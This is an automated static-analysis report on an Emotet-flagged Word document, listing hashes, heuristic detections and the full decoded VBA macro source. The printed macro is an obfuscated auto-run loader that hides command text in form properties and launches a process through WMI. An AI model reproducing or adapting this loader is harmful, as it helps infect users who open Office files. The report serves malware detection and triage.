Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d8f3b27336f71c5b…

MALICIOUS

Office (OLE)

196.9 KB Created: 2019-12-18 08:14:00 Authoring application: Microsoft Office Word First seen: 2020-05-14
MD5: d3100040583751236509f097698d5ff5 SHA-1: 41e81bffbf172f2d03cbbd7d8a2e70b78a6255f5 SHA-256: d8f3b27336f71c5b16a9573a8f0c950e18293d8f112c4e595a2719b66efb06dd
232 Risk Score

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7464351-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7464351-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Sycaagcvag = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Ohzfpovte.Okwrtmcmokcs + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Rhcujivdoau = VBA.CreateObject(JJKBSKJ + Sycaagcvag)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10680 bytes
SHA-256: 735c7348189bec3d0f5209f59be363cada8ae1ff8fd2e6a4a9c83a586a7dd0fa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
343 of 514 identifiers look randomly generated (e.g. 'W32ksad_weddvin32ksad_weddv332ksad_weddv') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ohzfpovte"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Okwrtmcmokcs, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Select Case Vgvlvktybvj
         Case Kyysnhlim
   Rzciwhkfx = Sin(Wtqtbsugkd)
   Zcdfgxdfjspuw = CStr(Cukeicybec)
   Sngcbgacg = 324
   Ehuyceev = Sin(Hslazcwaaycm)
   Rdpoovfeir = CStr(Ndvxagwnkvucc)
   Cguzrrkh = 567
   Qhbodjttcpt = Sin(Yvqdawjm)
   Sdyospfdww = CStr(Zvyglajank)
   Vebnjkqb = 5645
End Select
For Jkfubdwmxitow = Tlidlxifu To Ostlfifdmnb
      While Fdbmokhhgipyh <> Yafkbnpesldk
         Iqsukxiwvrkl = Jemxkmeli * Atn(Kpyiblzyoxr) * (Xalcfozqh + Oyfawpxibfzh)
      Wend
Next
   Select Case Wmrasvwsic
         Case Lvwgaxvcvafmh
   Gfxcdgblx = Sin(Zepcdabr)
   Qfblmjnvh = CStr(Fpqmkaqpkjyp)
   Qmtxfkpnapawq = 324
   Oqqljtpyptalb = Sin(Sqdnvwuycudso)
   Ojzsvshdne = CStr(Deeznxexjsd)
   Usoqgbax = 567
   Qmiudknqi = Sin(Quxvpvkddv)
   Sbasmgda = CStr(Znnfdamw)
   Brdyqvrfquzj = 5645
End Select
For Qtdrbjftsq = Ikrjrhsmbb To Brpxkwbp
      While Pkxuutpi <> Dgmhohcrryh
         Apjuhjwofhevh = Myxtcjzvehjct * Atn(Ewaowelzhzczx) * (Mgwgfsaol + Ufmxgdfg)
      Wend
Next
   Select Case Lwvpsjsqzamt
         Case Igfsjmpam
   Brbnflat = Sin(Zqrjrxuzwqxjq)
   Nvumfkkhl = CStr(Rdtpmzqlipoj)
   Vbqxfsbjfsq = 324
   Rlpjfsagq = Sin(Exsejrzlc)
   Itjfypixaz = CStr(Zatgiqrhewjt)
   Xantedjhcvzzu = 567
   Sehyeteplqulq = Sin(Kqxysikhuc)
   Xygjwgjmrbvd = CStr(Kbcjrtbqlicv)
   Iwnwvcgqfhy = 5645
End Select
For Tvivtszxi = Kqpgnygaot To Ozhdmuwvlmmi
      While Nidtsarc <> Mzdgaxqnq
         Wlpmdlkzxdhl = Yxuacdlncr * Atn(Punvyruiqwn) * (Pgdobfoswca + Nxijjxzmvp)
      Wend
Next
Hlapdnjk
End Sub

Attribute VB_Name = "Svwebryswbx"
Attribute VB_Base = "0{E63A8E29-ECBB-4891-834E-6C8A7EB38957}{AC36B4C4-DB8F-4E14-AAD0-E9DD8E767F8E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Syiycnhxkbedn"
Function Pvpmmwkzwdlme()
   Select Case Wsmdwaydefns
         Case Keeepqlxzrhu
   Epaikfajghwan = Sin(Dvbmvbzswra)
   Tuwbqazpefint = CStr(Xiocaivvgiove)
   Rjybplku = 324
   Mzyqsybzbvn = Sin(Grxzqtbfusaoy)
   Mmmoepoixenj = CStr(Ccqokrjsltaii)
   Yctjinpiz = 567
   Siaudjojrq = Sin(Oxjubsnvhwbyc)
   Eintrrbz = CStr(Qqqtyarocfmz)
   Plbbwhbskjj = 5645
End Select
For Wsimyick = Ciwjkznnfozdf To Ctqyggky
      While Wutnqqdnoztz <> Swweldtmtmvp
         Wqskapofua = Wqrphcvyfjkgm * Atn(Jbhsberr) * (Izidncvpn + Udesungm)
      Wend
Next
Dwyjwtrbgp = Ohzfpovte.Okwrtmcmokcs
   Select Case Apeitobvjaxx
         Case Akvcidef
   Ikyjtfnwfmq = Sin(Nxbeozgfwtbl)
   Rnenvunaips = CStr(Mbrnlvpi)
   Zpgollqxy = 324
   Wiayukhmoml = Sin(Teefpqnglhey)
   Cprsulnqt = CStr(Qkhvqundlvh)
   Hidjkavafe = 567
   Wtrahclnqzffl = Sin(Rudkvjglli)
   Svpkfcytb = CStr(Esvsuhcx)
   Nefcuknqhfs = 5645
End Select
For Ssapzdmblusys = Lejkfreqkhl To Dtqkbwdzus
      While Mmcjmdckxedw <> Eocphnlbyseix
         Qrlfqsecgxdjg = Ptcdroxekpilo * Atn(Egfogmrqr) * (Mwsdeenz + Ftehtnbqhh)
      Wend
Next
Jltfxipurrvv = Dwyjwtrbgp + Svwebryswbx.Artcdlagwia + Svwebryswbx.Ojskbjakj + Svwebryswbx.Gpihqmcxuyw
   Select Case Aldrmcty
         Case Hmjgoeuxblzy
   Siuonsultylu = Sin(Phaokhspwdpi)
   Pfccgjzeif = CStr(Avtkutob)
   Kloxbclryemh = 324
   Wjohtkzvcgh = Sin(Miwueevuqoihw)
   Ghrszfolfhi = CStr(Pihqefyicjid)
   Fugzxriovooy = 567
   Xqnwhafigrcqu = Sin(Xjpxmiqyh)
   Mamtcgoal = CStr(Lvanxopxgwaky)
   Afpgsflbofvno = 5645
End Select
For Twtbxuxz = Jkejlqon To Jketqaumh
      While Aaederxi <> Geeivhsd
         Ajqsirzkw = Rjbjjzghzr * Atn(Cdgalusc) * (Uaqjmumrmles + Czmimwqqvjoo)
      Wend
Next
Rplojgrhtxtd = Jltfxipurrvv + Svwebryswbx.Pmtmthhw + Svwebryswbx.Tzhtsotph.Factoid
   Select Case Ctqxabzopzct
         Case Vifgbdesy
   Lyymcscd = Sin(Rostyfsvppfl)
   Nkjjqojue = CStr(Cacmgaqcmeu)
   Dxlwjwwzjp = 324
   Jsmejxjwewfp = Sin(Ppjcetxwgs)
   Lhapskduwid = CStr(Hkqihsvm)
   Gqglfumlt = 567
   Lcvodumpmglka = Sin(Gnzagalaty)
   Xzkwjwgviuudy = CStr(Navfgownyltuv)
   Cpruopck = 5645
End Select
For Ubaltwcxdyz = Fkbmlkqbkvgs To Duhkpsrmmv
      While Pqxrabewl <> Drzmmjfutoj
         Vojfbtxf = Uzetuenib * Atn(Etqgedhbi) * (Ruvmryurm + Lfmhqkqfgifu)
      Wend
Next
Pvpmmwkzwdlme = Drpemnasjwfa + Rplojgrhtxtd + Drpemnasjwfa
   Select Case Uhlsynexfptw
         Case Kpqzinam
   Zrmzlaor = Sin(Zlpnsjfvlz)
   Kklevugltisj = CStr(Bfleabvoc)
   Dgyiebqf = 324
   Bogetkppr = Sin(Ulhzjgyuz)
   Lesohdpgc = CStr(Azrezhqgykf)
   Vriuurkgk = 567
   Cmfdmakr = Sin(Kiifhqesx)
   Jksquumku = CStr(Fpbncnuyzot)
   Iapmbfnmwv = 5645
End Select
For Mmrfygha = Tduoqyzx To Jhhufziotej
      While Lpbcsbhma <> Hmsmpomye
         Fewzyxsgptzu = Pvgvkdiqbnthw * Atn(Rkpftjwgt) * (Tublhrjnat + Tzjpdjgr)
      Wend
Next
End Function
Function Hlapdnjk()
   Select Case Ptfshsnddsa
         Case Pcglqcadapzv
   Jdhqentpbua = Sin(Ehqsnainhlw)
   Bnoegxdbeawb = CStr(Yzbmkxnvvjxm)
   Ccrknjlfaxoc = 324
   Ahuqrfkngzm = Sin(Fsfgtcizc)
   Oljsydyhha = CStr(Pgupkowsygc)
   Vquahoyyicf = 567
   Pcaezgkepayn = Sin(Gpmijdfcmd)
   Mxogdpts = CStr(Sugwuigqvmjd)
   Wuwsnmpxwz = 5645
End Select
For Pjwjufkmxsb = Wwwiuqiffk To Afnevxhdgtxu
      While Etfldskiqpto <> Kijymqtawi
         Ticdzbwbmpzu = Iroxkgvysyj * Atn(Vzewwjjzb) * (Qrsawviprvi + Zxwyvqeubu)
      Wend
Next
MNDUE = "32ksad_weddv"
Sycaagcvag = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Ohzfpovte.Okwrtmcmokcs + "rocess"
   Select Case Hggvegjsms
         Case Dsyhchhqggd
   Lfhyfmiac = Sin(Oisgecwozg)
   Nmhgerfbd = CStr(Tactgglpbv)
   Toaldjpybsat = 324
   Feiwwfgvzfbiq = Sin(Rsjysnsdgbr)
   Lbzjhiagge = CStr(Nxpvjvtgkk)
   Utknacufrwk = 567
   Sbhhhknlo = Sin(Ciwgxhyabjo)
   Mgejtrqnrprtl = CStr(Zlfgnuls)
   Hkyjwwdnkub = 5645
End Select
For Rwpckseml = Bpdhzcbnxumh To Vtngbdcs
      While Jysazcbvcci <> Voitnijfpxyp
         Gketiipxbjb = Sqepvoasstko * Atn(Iuatkalvkxjzy) * (Myrznqpkicazy + Teykhdaqqnjx)
      Wend
Next
Set Rhcujivdoau = VBA.CreateObject(JJKBSKJ + Sycaagcvag)
   Select Case Ibeityhdxz
         Case Hcdqjiljqe
   Phomrpalxtsy = Sin(Yfljmhozr)
   Imueoseol = CStr(Kumhzpnokf)
   Kfxhrfdqq = 324
   Icfhiankd = Sin(Vqwehzldla)
   Kyqlmjicw = CStr(Efthenwvysy)
   Lmxdemgfb = 567
   Irpbaujpdcsz = Sin(Hppfjompjzzl)
   Jlidkyymxuudi = CStr(Ftnjlxxqa)
   Jtipbppmf = 5645
End Select
For Oppturulgfdj = Mbtamuhle To Eitfnwcnl
      While Urcfwplafkdjo <> Ltyldlzopjbfs
         Wtcpgbxh = Zejubyerqljo * Atn(Mvdmvujt) * (Okhzgunma + Gptokwobx)
      Wend
Next
Ghvtrxurmjii = Sycaagcvag + Svwebryswbx.Tscectrcdsvyy.ControlTipText + Svwebryswbx.Hidrkcwoctp.ControlTipText
   Select Case Lvxashrlsvmda
         Case Jpbswjzvmyg
   Gfxerhljqmh = Sin(Caunwmjzqfuxy)
   Akbmzefnyi = CStr(Ogscuvbgybyc)
   Nqzcgtszjfkvx = 324
   Nvfktvtxcabxh = Sin(Mzsaronvbsaow)
   Zxkilftsadtt = CStr(Fvkmktld)
   Izaertgx = 567
   Bdnzbtshrx = Sin(Qswxpclugvbk)
   Epbhwwjmbb = CStr(Kqadlzcnii)
   Delodfcdyppd = 5645
End Select
For Bbldqupdru = Kchmdwgh To Kujwzfmvbwxb
      While Bernezmr <> Uavmlsxy
         Rquuukqvty = Egkzfsddf * Atn(Ibyjakiz) * (Okljwtuirywv + Pblnevceyqmsv)
      Wend
Next
Kgbephgsxo = Ghvtrxurmjii + Ohzfpovte.Okwrtmcmokcs
   Select Case Qqluhhyaemb
         Case Uleajwdabyfix
   Nwitjzmmilcxt = Sin(Canilnlwpbzpp)
   Lkaynieik = CStr(Yvohyjvdv)
   Pvmbzsrjjxuc = 324
   Wvrqysdidopi = Sin(Qumvcrve)
   Imrbpketop = CStr(Emxlrgrylrj)
   Plyaiwsjfhma = 567
   Tkwttbcpzyqa = Sin(Ozrcdhayftg)
   Eyelkpnxnp = CStr(Mrzlakhievg)
   Xtsuednarx = 5645
End Select
For Mfkbpaktlqqa = Iykejsobn To Dimkpvuiroex
      While Uvwyhdrhauo <> Nyfkspflrx
         Uwsvqebdoowr = Sdvisvzjg * Atn(Dmibddxncm) * (Mjqnmxycohmwc + Fovlpjjnrt)
      Wend
Next
Set Hlapdnjk = CreateObject(Kgbephgsxo)
   Select Case Udnqgzbfknryb
         Case Pfimgowwdmc
   Bgbufamyy = Sin(Icsgsovpib)
   Uzwkyhkeegsed = CStr(Saypqfyeewpdo)
   Khkkguipnr = 324
   Fbjncgrcokmar = Sin(Sojdwnrvlutf)
   Kkxdjtduim = CStr(Nxavjslzqbenr)
   Fxtjaosdaox = 567
   Rxfwgzzu = Sin(Kbudtjfklaf)
   Pdwivtagmjjht = CStr(Hsitkhihg)
   Uueliwuaqsjqe = 5645
End Select
For Jxrlwanwcsrm = Gvqyvzfcbbm To Epxbdspylquo
      While Ybsqjhkkw <> Ibpgwpyjgigf
         Uxrvevjwshb = Cfiutejvrz * Atn(Bwfsxrvbdpj) * (Rxiljienewd + Nahsdyzgdze)
      Wend
Next
Hlapdnjk.XSize = False
   Select Case Rbobrehd
         Case Cxdhovzjwomzl
   Bjymgjhzk = Sin(Xwhgntfjue)
   Zxbgywosqet = CStr(Jqapuysnfydb)
   Stbpdlty = 324
   Dicwbsscr = Sin(Cfuzgxcu)
   Ejvwypppeckcu = CStr(Vwmnfakdxp)
   Pxnqeqhyy = 567
   Dddnmjta = Sin(Nkaqhsxuf)
   Jizsrlflm = CStr(Owijcnxudpe)
   Mmaxxket = 5645
End Select
For Tveuvynoxuaw = Xqkwlurfi To Ekiocjtfc
      While Xsbvqagfbqi <> Gziiocnm
         Rnfaukgqbri = Upeqzdvqvqhi * Atn(Lqabcrek) * (Aluvzhbsni + Kloilxvxxrrj)
      Wend
Next
Hlapdnjk.YSize = False
   Select Case Tmuuzgcdlwo
         Case Tiapqhpjm
   Nrzefnyl = Sin(Srrcfptdw)
   Ykovcuidrf = CStr(Tgihyyyxc)
   Brjnkrwf = 324
   Ppglicsqhc = Sin(Lyvxhueyzi)
   Nethylvzrv = CStr(Bwqvfhucbpf)
   Nkbarjhwyydj = 567
   Vhztquevlejs = Sin(Qgxzipkbtya)
   Udxmmupzubwoq = CStr(Yxryrugraebv)
   Obteyjrnrwyc = 5645
End Select
For Ebkrcsdvgbvb = Wikyiegack To Akguzofk
      While Tktorsuriwvfr <> Aujpeyzyzs
         Lchveawoaeu = Flcviutwizt * Atn(Hbtltvydipba) * (Uulvzwbym + Rxzsdcnz)
      Wend
Next
Do While Rhcujivdoau.Create(UJNDB & Pvpmmwkzwdlme, Blvlmzkw, Hlapdnjk, Xkkccbkwm)
Loop
   Select Case Pztynubt
         Case Aobyrqjhloqf
   Gfaglbhahfm = Sin(Tvrspygcl)
   Bmxrnlljzgsh = CStr(Hcmzhvmbjqlu)
   Htkuofey = 324
   Nvucqzaowxi = Sin(Devhadhgtqkc)
   Ytoqizwmlbjlj = CStr(Xysmyhqtxevwj)
   Jajdcuigz = 567
   Qstxotriwssqh = Sin(Zqmncntgs)
   Fncprspa = CStr(Azpbfaxmqjbou)
   Tmtlwlaomnd = 5645
End Select
For Azahxkzrx = Mvtbzartgxygw To Mzlcnbtqmrju
      While Vawavybryo <> Kzictdrdxafux
         Ehkqgaikxbfa = Vaxqrqtikyfc * Atn(Vubdzfxkox) * (Bokancalczie + Zwwmkdovp)
      Wend
Next
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.